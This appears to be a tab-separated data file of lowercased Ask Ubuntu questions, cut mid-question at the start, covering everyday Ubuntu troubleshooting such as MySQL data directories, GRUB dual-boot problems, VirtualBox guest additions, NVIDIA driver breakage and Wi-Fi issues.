microsoft windows kinect driver reserve 60 % of the usb bandwidth for the kinect , does the openni driver do the same ? i tried to lower the webcam bandwidth by asking it to send a mjpeg stream instead of rgb images . this should greatly reduce the bandwidth of the webcam , but the result is the same , the kinect does n't work when the camera is on . do you guys know how usb bandwidth gestion works on ubuntu ? is it the usb driver , the webcam driver or ubuntu that reserve the usb bandwidth ? how can i reduce the bandwidth reserved for the webcam ? i already set up as an mjpeg stream , with resolution of 640x480 and 15 fps ... which is already low ! thank you so much for your help , and let me know if you need some other information .
247561	how to iconize all windows for current application , unity	i am used to docky , and miss the ability to easily iconize/hide all windows for a given application , or to see a list of the window titles for each window for a given application . double clicking the icon in unity shows all of the current windows as a means to select one of them , but a simple list of window titles when you hover the pointer over the icon would often be preferable when you are thinking of the name of the document you want to show . is there a better way to iconize all the windows for a current application than having to click on each of their iconize buttons on their window bars ? in docky , you can show or hide the windows by clicking the application icon on the icon bar .
247563	picasa as default using wine	i 've installed picasa 3 with wine ... now i 'd like to use picasa 3 to run with wine as the default application when i open a photo instead of shotwell or other default programs for ubuntu 12.04 !
247564	what is hexdump command , and what does it do without parameters ?	i ran hexdump command without parameter and my ubuntu machine froze ... what did i do ? what does this command do without parameter ? and what is it useful for ?
247567	how can i lock down ubuntu to act like a thin client for vm view ?	i would only want to allow wireless settings and view to be used .
247568	unable to start mysql server after install/config	i installed the mysql-server from the repositories , and wanted to change the datadir to a custom location . with the datadir set to /var/lib/mysql i was able to start the server , but to the new location i get an error . error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) here are the changes to my.cnf : user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /media/db2/mysql tmpdir = /tmp lc-messages-dir = /usr/share/mysql skip-external-locking i was searching this and other sites , came across this link and changed my /etc/apparmor.d/usr.sbin.mysqld file . here are the relevant changes # /var/lib/mysql/ r , # /var/lib/mysql/** rwk , /media/db2/mysql/ r , /media/db2/mysql/** rwk , i then was able to restart the mysql service with sudo service mysql restart but was not able to open up mysql with mysql -u root -p i got another error similar to the above . so i searched some more and copied the files from /var/lib/mysql to my new dir . now when i try to restart mysql it just hangs . the log file in /var/log/mysql/error.log shows : 130125 12:35:41 innodb : waiting for the background threads to start 130125 12:35:42 innodb : 1.1.8 started ; log sequence number 1595675 130125 12:35:42 [ note ] server hostname ( bind-address ) : '127.0.0.1 ' ; port : 3306 130125 12:35:42 [ note ] - '127.0.0.1 ' resolves to '127.0.0.1 ' ; 130125 12:35:42 [ note ] server socket created on ip : '127.0.0.1 ' . 130125 12:35:42 [ error ] /usr/sbin/mysqld : ca n't find file : './mysql/host.frm ' ( errno : 13 ) 130125 12:35:42 [ error ] fatal error : ca n't open and lock privilege tables : ca n't find file : './mysql/host.frm ' ( errno : 13 ) 130125 12:35:43 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 130125 12:35:43 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 130125 12:35:43 innodb : the innodb memory heap is disabled 130125 12:35:43 innodb : mutexes and rw_locks use gcc atomic builtins 130125 12:35:43 innodb : compressed tables use zlib 1.2.7 130125 12:35:43 innodb : using linux native aio 130125 12:35:43 innodb : initializing buffer pool , size = 128.0m 130125 12:35:43 innodb : completed initialization of buffer pool 130125 12:35:43 innodb : highest supported file format is barracuda . innodb : log scan progressed past the checkpoint lsn 49439 130125 12:35:43 innodb : database was not shut down normally ! innodb : starting crash recovery . innodb : reading tablespace information from the .ibd files ... innodb : restoring possible half-written data pages from the doublewrite innodb : buffer ... innodb : doing recovery : scanned up to log sequence number 1595675 130125 12:35:45 innodb : starting an apply batch of log records to the database ... innodb : progress in percents : 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 innodb : apply batch completed i think appamor is the issue , and it 's basically a permissions issue ... here are permissions from the location where i want the db files to be ... $ ls /media/db2/mysql -al total 28732 drwxrwxrwx 3 mysql root 4096 jan 25 12:39 . drwxr-xr-x 4 root root 4096 jan 25 2013 .. -rw-rw -- -- 1 mysql mysql 18874368 jan 25 2013 ibdata1 -rw-rw -- -- 1 mysql mysql 5242880 jan 25 12:39 ib_logfile0 -rw-rw -- -- 1 mysql mysql 5242880 jan 25 2013 ib_logfile1 drwx -- -- -- 2 root root 4096 jan 25 2013 mysql any help would be appreciated . thanks !
247575	setting a file types default program to be a jar file	i 'm using ubuntu 12.04 . i have a file with an extension .sbd and i have a jar file ( that i 've written ) that can open these extensions . however , i want to be able to click on the .sbd file and have the jar file open it . the issue is the open with tab in the .sbd file 's properties wo n't let me browse for the jar file . how can i do this ?
247576	why does virtualbox 's main window closes immediately after launching it ?	i have virtualbox 4.1.10 running in an ubuntu 10.04 64-bit host . it ran perfectly until today . when i launch it , the main window opens and , above it , the new version available notification window . normal behavior until this point . but when i click the ok button to close the new version window , the main window also closes . no error message is displayed . i 've tried running sudo /etc/init.d/vboxdrv setup and also reinstalling vbox but i still have the same issue . i 've tried again today ( without doing any change ) . now , the new version available windows does not appear . also the main window does not dissapear , but when i try to start the virtual machine ( windows xp ) i get this message : a session for găźindous virtual machine can not be opened . failed to load vmmr0.r0 ( verr_suplib_owner_not_root ) . resultat codi : ns_error_failure ( 0x80004005 ) component : console interfă­cie : iconsole { 1968b7d3-e3bf-4ceb-99e0-cb7c913317bb } anyone has any clue about what 's wrong ?
247577	how can i drag & drop a jpg-file into scribus ?	if i try to drag & drop a jpg ( or other graphic file ) from nautilus via the unity dash into scribus , the dash symbolâs are `` grayed '' and only some app 's are usable but not scribus . how can i make this symbol usable for drag and drop ?
247578	ca n't boot windows 7 after ubuntu update !	i have ubuntu 12.04 installed on /dev/sda partitions and windows 7 on /dev/sdb partitions . in the past i have been able to boot into windows 7 from /dev/sdb2 or /dev/sdb3 . now i ca n't anymore . i have done several update manager updates since the last time i tried to boot windows . today when i tired i got : error : no such partition press any key to continue . i 'm running kernel version 3.2.0-36-generic . i suspect that this was installed since the last time i tried to run windows 7 . can you help me ? i have seen several suggestions that i should run update-grub , but i want to be sure i should before trying .
247582	use a different .desktop file for different window managers	i am using ubuntu 12.04 ( desktop ) and i primarily use 2 window managers currently ( xmonad and the standard unity ) . in xmonad i need to launch nautilus with the -- no-desktop option , but when i am using gnome/unity i do not want to use that option . is there a way i can conditionally specify that option ? perhaps use 2 different *.desktop files such that synapse ( launcher in xmonad ) defaults to one of the files and everything else defaults to the other file ?
247583	how to change mac of wlan0 ?	can anybody tell me the way to change mac of wlan0 ? i have tried macchanger commands but nothing works ( ubuntu 12.10-broadcom network adapter ) . this is what i am getting : i have tried the following : shivendra @ shivendra-rev-1-0 : ~ $ sudo ifconfig eth1 down [ sudo ] password for shivendra : shivendra @ shivendra-rev-1-0 : ~ $ sudo service network-manager stop network-manager stop/waiting shivendra @ shivendra-rev-1-0 : ~ $ sudo macchanger -a eth1 current mac : 00:21:00:72:9c : d5 ( unknown ) error : ca n't change mac : interface up or not permission : too many open files in system shivendra @ shivendra-rev-1-0 : ~ $ sudo macchanger -- mac 64:27:37 : d8:97:6f eth1 current mac : 00 : d0:61:9d : bf : a5 ( tremon enterprises co. , ltd. ) error : ca n't change mac : interface up or not permission : too many open files in system shivendra @ shivendra-rev-1-0 : ~ $ sudo service network-manager start network-manager start/running , process 2182 shivendra @ shivendra-rev-1-0 : ~ $ sudo macchanger -- mac 64:27:37 : d8:97:6f eth1 current mac : 64:27:37 : d8:97:6f ( unknown ) error : ca n't change mac : interface up or not permission : too many open files in system
247585	ubuntu 12.10 black screen when trying to install	i am currently using windows 8 . i tried installing ubuntu 12.10 through the windows installer however upon restart of my computer when clicking on ubuntu in grub i am told that windows could not start because i 'm missing wubld.mbr file . something along those lines . my question is how can i remove this ubuntu boot option from grub ( i 've already tried command prompt fix mbr commands ) and then , how do i get ubuntu working on my machine !
247586	how to make terminal bell play an alert sound without pc speaker ?	how can i get the terminal bell to play an alert sound out of the regular speakers ( not the pc speaker ) ? i have irssi set up to beep for various irc events , but nothing happens because the beep uses the terminal bell . also , see my related question about visual alerts .
247591	positon of exit button	how can i set up the exit button on aplications to be on the right side of the window ? i use ubuntu 12.04 lts .
247593	ubuntu 10.04 python modules	i want to install lxml on an ubuntu vps , but i 'm having problems . there is no site-packages directory where i can put lxml . how i am supposed to install it ? i tried doing : apt-get install python-lxml , but it says that the package is unavailable , so i tried moving it there but i do n't have site-packages folder . i 'm running ubuntu 10.04 lts with python 2.6 , or more info : > python 2.6.5 [ gcc 4.4.3 ] on linux2 any help will be appreciated , thanks !
247597	my boot time has increased by 25 % in the past two months . how do i reduce it ?	i used to have a boot time of ~35 seconds till 2-3 months back . now it is about ~50 seconds or more . shut down time has also doubled . before it used to be at most 5 seconds . now it is at-least 10 seconds . what is causing this ? more importantly , how do i reduce it ? my laptop is an asus u32u - rx012d . it has mostly development software and related files on it . bootchart image linked . another one . some extra information : hard drive usage is 15gb of a total of 320gb swappiness is 1 preload doesnt work and it has been confirmed to be a bug some unneccesary start-up services are disabled defragmented root directory . no change in performance . feel free to ask for any relevant information .
247598	alert volume slider sound file	in ubuntu 12.10 , when you go to sound - > sound effects tab and slide the alert volume slider , it makes a `` pop '' sound . what is the name of that sound file ? i 'd like to set it as my terminal beep sound . hint : it 's not in /usr/share/sounds/gnome/default/alerts/ .
247608	ca n't access grub2 after installing ubuntu 12.10	i had a slackware linux installed with lilo boot loader and i decided to change to ubuntu so i deleted slackware partition and used easybcd to return to windows 7 loader then i burned ubuntu 12.10 64bit onto a dvd and booted it up . the installation and everything else is fine but when i reboot it boots straight up to windows 7 not even to grub2 menu just windows 7 . any help ?
247609	nfs client/server trouble shooting	i have a compute and storage node . the home directory is shared via nfs . i 'm having a problem with the io when logged from the compute node . it runs incredibly slow . for example a `` $ wget '' or `` $ svn co '' will take several orders of magnitude from the compute node than from the storage node or a `` $ make '' due to creating the files/installing will run slow . presumably this is due to the io writing from the compute to the storage node . i 've run several tests to convince myself that it is indeed the io . both nodes are connected through a gigabit switch and it 's a straightforward install . i 'm at a loss on how to troubleshoot this because i 'm very new to nfs setup etc . any advice on how to even start trouble-shooting this will be greatly appreciated . thanks !
247613	necessary to add dns-nameservers and such in interfaces for ipv4 and ipv6 ?	simple question , but have n't found an answer anywhere , so turning here : when setting up /etc/network/interfaces do i have to set up the dns-nameservers line both for the inet and the inet6 parts of the configuration separately ? my guess is yes , because the values/ips for the servers obviously differ . but i 'd like to get an authoritative answer , preferably with pointers to the source of whatever the answer turns out to be .
247623	gnome 3 opens only the wallpaper	i changed the gnome 3 theme and it was working perfectly except the terminal , i restarted the system but now it opens only the wallpaper without any icons or bars . i ca n't open any of my files . i tried this command to restore the gnome settings but nothing : rm -rf .gnome2 .gnome2 .gconf .gnome2_private/ .local/share/gnome-shell/ how to fix this issue .
247624	how to printk ( ) a s32 kernel data type	when working with a wireless driver module , noise in the wireless medium is reported to the module as a s32 data type , which is defined in linux/types.h . i would like to use printk ( ) to print out this value to the syslog , however when i do i get unintelligible results . current attempts have been : printk ( `` % d '' , val ) ; printk ( `` % d '' , ( int ) val ) ; printk ( `` % 3i '' , ( int ) val ) ; printk ( `` % 3i '' , val ) ; printk ( `` % lx '' , val ) ; printk ( `` % lx '' , long val ) ; i do n't understand is how to format this for printing . i have also not been able to find any information thus far on how to do so . since it deals with kernel data types , i thought it might be appropriate to post in askubuntu .
247625	what is the loopback device and how do i use it ?	what are loopback and localhost ? why do they exist , what are they used for , and how would i use them ?
247628	how to prioritise dual-boot to ubuntu over windows ?	as the titles suggests , i have no idea how to change the dual-boot to making ubuntu load over windows , any help would be appreciated
247629	how do i display the whole desktop in virtual box fullscreen mode ?	i am running ubuntu 12.04 in virtualbox 4.2.6 on a windows 7 host . after installing ubuntu i wanted to get the vb interface in fullscreen . i therefore installed guest additions from virtual box manager ( devices > install guest additions - > run -- > reboot ) . but after booting i can only see a part of the desktop without menus . in addition i am asked again to install the guest additions after every reboot ( the guest additions cd reappears even though i had removed it ) . editing the resolution in system settings via right click > appearance - > all settings ( since i can only partially see the desktop ) the actual resolution changes but the whole desktop still does not fit . do i have to uninstall/reinstall the guest additions ? what other options do i have ?
247633	does `` generic '' tablet drivers exist ?	i recently installed ubuntu 12.10 and it 's awesome except that there does not seem to be any support for my drawing tablet . this is what i got : http : //www.trust.com/products/product.aspx ? productcategory=input & productgroup=graphic-tablets & artnr=16937 i seem to be able to draw unless i lift the pen up for a second ( like when normally moving around without holding it down to draw ) , after which the pointer becomes unresponsive for about 10 seconds , and then i can draw again . so it 's not the end of the world if i ca n't get it to work , but is there anything such as generic tablet drivers which would work in my case , or something specific for my tablet ? i searched google but could n't find anything .
247635	what software is available to de-fragment ubuntu filesystems ?	i would like to defragment ubuntu ; however , i can not find software that i can download . what is available ?
247639	ubuntu-tweak : missing `` workspace '' button on tweaks- > desktop session	i have ubuntu-tweak installed on three ubuntu 12.04 machines . one of them is in trouble : it is missing the tweaks- > desktop- > workspace button . anyone knows the solution ?
247642	choppy bluetooth sound	i am running ubuntu 12.10 on a mac mini and have extremely choppy sound when streaming and connected to a bluetooth speaker . sound is normal otherwise . the video streams fine with no choppiness . cpu and network utilization are high but not maxed out . any ideas would be appreciated . note that sound only streams fine , it is only with video that we get chop .
247643	ubuntu crashed once shortly after partitioning during install . my second attempt was successful , but i have some concerns	is there something i should check , or a procedure i should perform , to make sure that nothing is wrong with my hard-drive or partitions ? and i noticed that i was n't asked to define a partition size the second attempt at installation . i assumed that the ubuntu installation picked up from where it left off ( shortly after defining the partition size ) - is this correct ?
247646	why do i get no option to boot either ubuntu or windows after ubuntu 12.1 installation for a dual boot ( pc automatically loads windows xp sp3 ) ?	i 've just installed ubuntu 12.10 . when asked to remove dvd to restart there was no boot option menu and pc started to load windows . checkdisk ran and displayed multiple messages , eg . deleting orphan file record segment 123416 . in windows xp my c : \ was reduced by the amount of space allocated to ubuntu partitions . i accessed boot menu and there was only the option for normal windows start up and windows recovery start up .
247651	version 12.04 takes forever to boot into kernel 3.2.0-36	as you can see from the title , i am having trouble with booting into the newest kernel of linux ( 3.2.0-36 ) from the grub . i am dual-booting windows 7 pro with ubuntu 12.04 and running ubuntu as my primary os . i have done a lot of checking in the forums and still have n't found a solution that solves my problem . my problem is that when i attempt to boot into the default linux kernel , the boot takes forever and nothing is displayed ( except a purplish screen that reminds my of the bsod ) . i am a total noob to ubuntu so i have no idea what i can and ca n't do in the boot , such as opening terminals , getting error reports , etc . i started using the 12.04 just a few weeks ago . if i do a boot repair ( which i had to originally from the livecd in order to get the grub to work ) , i can boot into the newest kernel quickly once and then every subsequent boot takes forever . also , i have noticed that there are a few stability issues , such as programs randomly closing ( my screencasting software ) . however , one last thing to mention , i am able to boot into a previous version of the kernel ( i am currently in 3.2.0-26 ) . does anybody have any ideas ? p.s . if you want to see any error reports , you will need to `` spell it out '' due to my status as a noob , but i do want to learn all that stuff so feel free to slap me upside the head . : )
247657	is ubuntu supposed to run hot if it 's installed alongside windows 7 ?	i just installed ubuntu 12.10 and the fan has been running a little hot for a good bit . even when i switch to windows 7 , it 's running hot . it did n't do this before i installed ubuntu . i have an hp dv6 running i7 , 8 gb ram , and a 750gb hard drive . i used the speedfan software to see what my temperature was . plus , the fan is pretty loud and i can feel the heat from the sides . i guess i want to ask two main questions : does ubuntu cause the computer to run `` hotter '' ? if you have ubuntu installed alongside windows 7 , are they both technically running at the same time , causing it to overheat ? thank you in advance for any help
247658	ubuntu 12.04 causing modem to crash	i 've noticed that when my ubuntu pc is running my internet connection drops periodically . the router seems to be ok , but i notice that my modem drops its connection and takes about a minute to reconnect . the connection is pretty good otherwise . certain activities seem to reliably cause a crash -if i begin downloading updates via the update manager then i know that within the next few minutes there 's a good chance that the connection will crash as i browse the my ubuntu htpc is connected to a router via a wired connection . many thanks for your help ! !
247659	i can see a background , nothing more ?	i 've never used linux before and i ca n't even get it running heh . basically i am using ubuntu 12.10 in virtual box , at that least that 's what i think i 'm doing . currently i am just watching this background picture though and i can move the pointer around but there 's no menu bar or anything . i tried some hotkeys as well but nothing pops up and the only thing i 've seen so far is compiz crashing . so my question is basically , how do i even get it running ? i 'd take a screenshot but there 's nothing to show . specs : intel core i5 2500k which should be like 3.3ghz i believe . 8192mb memory . nvidia geforce gtx 560 ti virtual box specs : processor : 1 cpu at 100 % memory : 512mb ( the one listed under system > motherboard ) display > video : 12mb memory i hope i did that right now : )
247660	blank screen while trying to install 12.10	i 'm trying to install ubuntu 12.10 for the first time . i 've downloaded the 64-bit torrent from ubuntu.com and have created a bootable usb using unetbootin . when i entered the bios and booted from usb , it gave me the options to try ubuntu , install it and some others . i 've tried both , but my result is the same . the computer displays a black screen and nothing seems to happen . the computer currently has windows 8 on it . thanks !
247666	why does ps -elf list user number and not user name ?	when i do this ps command : sudo ps -elf | grep firefox i see this output : 0 s 1002 20214 1 0 80 0 - 269240 poll_s 14:03 ? 00:00:24 /usr/lib/firefox/firefox 0 s jeff 22671 15484 0 80 0 - 3396 pipe_w 15:14 pts/0 00:00:00 grep -- color=auto firefox why do i see my own user name in one case , but a user number in the other case . the other user is a real person logged into the computer . i can tell who it is by looking at /etc/passwd .
247672	passive cooling on laptop	i have a dell xps 15 laptop ( model number l502x ) . in both windows 7 and windows 8 , i have been able to select power options ( power saver , high performance , etc. ) . in the configuration settings for these options , there was a cooling option , where i could choose between passive and active cooling to save power . when i switched to the passive cooling mode , the fan would remain off most of the time , unless i switched to a program that required a lot of cpu/gpu power , during which the cpu and gpu would start working harder , and produce more heat , turning on the fan . i do not believe that the fan was os controlled , though . i had previously tried to download and use a program ( speed fan ) on windows to see if i could control the fan , and it did not see any fan , so i assume that the fan is bios controlled , and that windows just alerted the bios to my current cooling preference . is there any way to have a setting on ubuntu ( 12.10 ) to switch to passive cooling to shut off the fan and save battery life ?
247676	using fonts with older apps ( ctwm , ical ) , and finding more fonts to use	i am using various old/legacy tools , such as ctwm and ical , which appear to prefer the fonts -- specifically , the font names -- returned by xlsfonts , instead of fc-list . that is , if i specify a font name output by xlsfonts , like charter-bold-r-normal -- 0-0-0-0-p-0-adobe-standard then ctwm and ical will use it . on the other hand , if i specify a font name output by fc-list , like palladio then those programs will ignore the specification and use a default font . unfortunately , the xlsfonts fonts are rather limited . for example , there is no `` helvetica '' font . note that i am working with a basic install of 12.04 ( precise pangolin ) , with a number of application packages subsequently installed through apt-get . as far as i know , i am only using the font packages that come with that basic installation . previously , i used 10.04 ( lucid lynx ) and had access to many more fonts ( including helvetica ) . so , my questions are : can i use the fc-list fonts with these older packages ? if so , how ? if i 'm limited to just the xlsfonts fonts , then are there additional packages that i should install ? am i missing something fundamental about these fonts and how they work ? if so , what ? thanks ! bob
247682	why ubuntu 12.04 shows me ahci error ?	i installed 64 bit ubuntu 12.04 lts and the computer wo n't boot . this is a dell precision workstation 690 computer , which has a bios dated in 2006 . it was running red hat el 4 quite well . the ubuntu installation proceeded without any problems . after installing ubuntu 12.04 , it has the following messages : controller bus # 00 , device # 1f , function # 02 : 00 ports no device found ahci bios not installed i tried switching from ahci to ata in the bios , which eliminated these particular messages , but it still would n't boot . what can i do to get this computer to boot with 12.04 ?
247692	guest additions installation ubuntu 12.10 on virtualbox 4.2.6	after ubuntu guest installation with windows 7 host i want to get full sized screen desktop interface by installing guest additions . after reboot , desktop is some kind of zoomed in , only partially accessible , menu bars not reachable , only right click is possible . trying to boot in recovery mode does n't do the trick.. single way to get back to full desktop is removing ubuntu drive from virtualbox and reinstalling .
247694	how can i get rid of 1mb of unallocated space at the end of this table ? ( gparted - see screenshot )	i ca n't seem to find a way to extend or move this 1mb , but it 's really bugging me .
247695	will i need a ppa for my dell xps 13 `` sputnik '' laptop ?	imported from google plus : does anyone know anything about the status of the sputnik project ppa for the dell xps 13 ? are there any plans to keep it up-to-date or at least ahead of the versions coming out of the standard repos ? also , will it be updated to keep up with raring ? it looks like it may be falling behind - it would be sad if it became unusable .
247698	how to setup adhoc between kubuntu 12.10 to ubuntu 12.04	so i 'm in a temporary situation . if i get the answer later , i still would like to know the answer . i have 2 laptops , laptop 1 is and old pentium m running ubuntu 12.04 ( the last supported os for it . ) laptop 2 is a much newer laptop running kubuntu 12.10 . i have a single ethernet connection where i am but no wireless router coming for another few weeks . i had no problem setting up an adhoc network from laptop 1 to laptop 2 by simply clicking on the network icon > create new wireless network ... > entering an ssid and key , select create and then pulling up laptop 2 , selecting the network icon , seeing the available connection and connecting . really simple , worked great . however , when i tried to reverse the setup and make laptop 2 the host connected to the internet , i discovered there is no `` create new wireless network ... '' option . when i goto manage connections and setup a new connection as adhoc . if i leave the ipv4 settings alone i can get laptop 1 to connect to it , but no internet . if i change the ipv4 settings to `` share '' on laptop 2 , laptop 1 just tries to connect for 5 minutes and never successfully does . the heck am i doing wrong ?
247702	ubuntu 12.10 wo n't boot after nvidia drivers upgrade	i have installed newest nvidia drivers ( from their site with the .run file ) on my laptop with nvidia geroce 420m . after some time i decided to try out open source drivers there i went to system settings - > software sources - > additional drivers and clicked open source drivers and applied the changes . after a reboot i have had no unity panel shown when i logged into the system . so i googled a little and then removed all nvidia-* packages ( except nvidia-common ) and installed nvidia-current-updates , rebooted and ... boom system wo n't load . so i booted now from the livecd and got some logs from it dmesg.log http : //paste.ubuntu.com/1571454/ boot.log http : //paste.ubuntu.com/1571456/ syslog http : //paste.ubuntu.com/1571474/ xorg.failsafe.log http : //paste.ubuntu.com/1571479/ in boot.log there is a line : initctl : event failed and in xorg.failsafe.log : ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) ( ee ) failed to load module `` modesetting '' ( module does not exist , 0 ) ... ( ee ) open /dev/fb0 : no such file or directory ( ee ) screen 0 deleted because of no matching config section . ( ee ) nvidia ( 0 ) : failed to initialize the nvidia kernel module . please see the ( ee ) nvidia ( 0 ) : system 's kernel log for additional error messages and ( ee ) nvidia ( 0 ) : consult the nvidia readme for details . ( ee ) nvidia ( 0 ) : *** aborting *** ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 when i try to boot from recovery mode to any repair filesystem , turn on networking etc . mode then i get something like : continuing will remount your / fillesystem in read/write mode and mount any other filesystem defined in /ect/fstab . do you wish to continue ? fsck from util-linux 2.20.1 /dev/sda : clean 318818/10117120 files , 24047888/40467456 blocks . what else can i provide to better illustrate the issue ? edit all i can do is go to the root prompt in recovery mode but ca n't remount my filesystem in read/write mode ( also i ca n't install packages because there is a dpkg/lock ) . if i choose any other option than root shell then i got stuck as described here : safemode how long should it take clean and free up space
247704	why am i getting a login prompt after installation of ubuntu 12.04.1 ?	i just installed ubuntu lts 12.04.1 on my computer from cd using option 2 to wipe windows from it . the first time i received an error when the computer tried to restart so i reinstalled , but now , when it boots , all i get is some text and a login prompt ( a terminal ) . can anyone help ? screenshot of what i 'm seeing :
247707	reset keyboard shortcuts ubuntu 12.10 ( compiz cube issue )	i just did a fresh install of ubuntu , and had customized some keyboard shortcuts before installing compiz settings manager . i enabled the cube setting , and followed the directions as per here : http : //www.noobslab.com/2011/10/enable-compiz-desktop-cube-in-ubuntu.html however , i come to find that i ca n't use my keyboard shortcuts to navigate with it for some reason . when i use the rotate cube as opposed to the desktop cube ( skydome ) , i can move horizontally through my workspaces ( it 's 2x2 atm , have n't looked into expanding that , yet ) but it wo n't let me get to the two workspaces located below . i get the feeling it has to do with the keyboard somehow , since at one point i was able to get the cube unfold gesture to work with ctrl + alt + down , but otherwise it did nothing . ultimately , i think the best way to solve the issue is to revert to the installation default keyboard settings , revert my compiz settings , and begin from stage 1 again . any help ? i 've also reverted back to the original wall pane settings , and find myself perfectly able to pan through all of my windows like this , so i 'm left thinking it is something in the compiz settings that i 'm missing ?
247716	how to set gnome classic ( no effects ) as default ?	i am wondering is there a possibility that every time i logged in to my ubuntu , the desktop is set to gnome classic ( no effect ) ? it is too redundant to set and choose it in the login every time .
247718	unity dash ignores privacy settings	relatively new full-time ubuntu user , but experienced computer user . i 'm asking a question that 's been asked before , but my specific case seems to be unique . i installed the latest ubuntu to my laptop in dual-boot mode with win7 . overall i really like ubuntu and i 'm using it more often than windows . however , i ca n't get the privacy settings in unity dashboard to work properly . i 've excluded photos and videos and blacklisted specific directories from the history , but it never seems to take . it 'll seem to work on first boot . no embarrassing photo or video files will show up in the default dash search pane . but the moment i actually view something in the photo viewer -- and here 's where it gets weird -- old photos and files i viewed two weeks ago will pop up again in dashboard . not the ones i just viewed , but the same dozen or so from a previous session long ago . and , occasionally , the specific directories i blacklisted will also pop up . most of these files , and the blacklisted directories , are actually on the windows side of the partition . is that a possible source of the problem ? i 'm dubious , because i 'm seeing similar issues from people without windows installed at all . this is a potentially very serious problem for me . the files i look at on my own time are nobody 's business but my own , but how can i use the dash in front of a client or a friend if i have no idea what random files it 's going to decide to display today ?
247720	no sound in manually compiled wine 1.7.18	i downloaded the wine 1.7.18 source code from sourceforge , installed the dependencies according to the ./configure file and compiled & installed ( sudo make & & sudo make install ) . the installation was finished successfully . i clicked the audio tab to configure audio , but it says selected driver : ( none ) . i ca n't even change the driver . when i click test sound button , no sound is heard . here is a screenshot : the error i got when clicking test sound button was : err : mmdevapi : dllgetclassobject driver initialization failed err : ole : apartment_getclassobject dllgetclassobject returned error 0x80004005 err : ole : cogetclassobject no class object { bcde0395-e52f-467c-8e3d-c4579291692e } could be created for context 0x1 how can i fix this sound problem ? update this same error happened on ubuntu 10.04 lts and ubuntu 14.04 lts .
247722	i 've installed gnome-panel , where is it ?	i 'm confused , i installed this gnome-panel from the ubuntu software center . after that , i ca n't seem to locate where can i find it . all i see here in the preferences is this compiz which i find not in favor of my minimalistic taste . i want to know the location where i can have preferences for the gnome classic ( no effect ) desktop i set .
247725	latest wifi update not working	i installed ubuntu at the start of the month , wifi sucked , updated everything was fine . last week the most recent wifi update that came out last week or like 5 days ago made my internet not work again , it cuts off and on every once in a while , i stream a video site and it starts cutting off and on and my speed test shows like .01 kbs sometimes i have an airlink 101 150n awll6070 what 's annoying is last week it worked fine , then i installed the wireless update and bam it messed up . can anyone help ?
247729	what programs are used to check free/used memory , disk space , and to manage tasks like the task manager in windows ?	how do i see how much memory i 'm using ? how do i see how much disk space is free ? is there a program like task manager in windows ?
247732	how to create and use casper-rw in different usb with a live usb	i have created an ubuntu live usb using pendrive 's universal usb installer . i found a link about creating the casper-rw but it 's for a live cd at https : //help.ubuntu.com/community/livecd/persistence . how do i create casper-rw and configure the live usb to recognize the casper-rw for persistence ?
247738	why is /etc/profile not invoked for non-login shells ?	login and non-login shell defined as : su - $ user # will give you a login shell bash # will give you a non-login shell /etc/profile is not invoked for non-login shells , such as when you start konsole ( kde ) . /etc/profile is only invoked for login shells . why is that ? please explain , because i like to understand the rationale of this .
247746	did efi partition ruin my hard drive ?	i ca n't access my hdd ( drive d ) . after having trouble installing ubuntu on my new efi system , i could n't boot either of the os on my ssd ( drive c ) . i fixed that problem by running boot-repair , allowing me to boot windows 8 again . but that created a new problem ... i can no longer access my d drive ( hdd ) ... in windows it says `` d is not accessible : the parameter is incorrect . '' i tried to format it , but the capacity just says 97 gb when it 's really a 2tb hdd . so i looked it up two ways : in the partition manager on my live usb , and in a program called `` getdataback for nfts . '' they both say that my hdd is an efi system partition . is this why i ca n't access it ? was this done by my boot-repair ? ? ? screen capture : i 'm not allowed to post pictures yet so here is the url to a screen-capture : http : //www.spacewineries.com/problem33.gif i 'm concerned mainly with the highlighted partition ... the 1st hd with two partitions . ( although i think i screwed up the boot-loader on the 2nd hd which now has 9 partitions . so : can someone tell me if i 'm right ? i feel like this highlighted partition should not be an efi system partition and that i should somehow convert it back to ... whatever it was ( lol ) . i guess i 'll do ext3 or nfts but i do n't remember its original file system . is this dangerous ? will i screw everything up ? what should i do ? ? thanks .
247754	share internet via wifi like connectify in windows	i use connectify in windows to access internet via wifi and create a wifi hot-spot to share internet with my other devices . since connectify is n't available for ubuntu , are there any ways that i can gain the same functionality ?
247755	how to install network drivers on dell iinspiron 5420 with ubuntu 10.04 ?	i followed this to install network driver how to install network drivers in dell inspiron 5420 ? but it show me this error $ sudo make make -c /lib/modules/2.6.32-38-generic/build m=/home/cyberboy/desktop/compat-wireless-2012-07-03-p modules make [ 1 ] : entering directory `/usr/src/linux-headers-2.6.32-38-generic' scripts/makefile.build:44 : /home/cyberboy/desktop/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros/alx/makefile : no such file or directory make [ 4 ] : *** no rule to make target `/home/cyberboy/desktop/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros/alx/makefile ' . stop . make [ 3 ] : *** [ /home/cyberboy/desktop/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros/alx ] error 2 make [ 2 ] : *** [ /home/cyberboy/desktop/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros ] error 2 make [ 1 ] : *** [ _module_/home/cyberboy/desktop/compat-wireless-2012-07-03-p ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-2.6.32-38-generic' make : *** [ modules ] error 2 i have dell inspiron 5420 ubuntu 10.04 64bit .
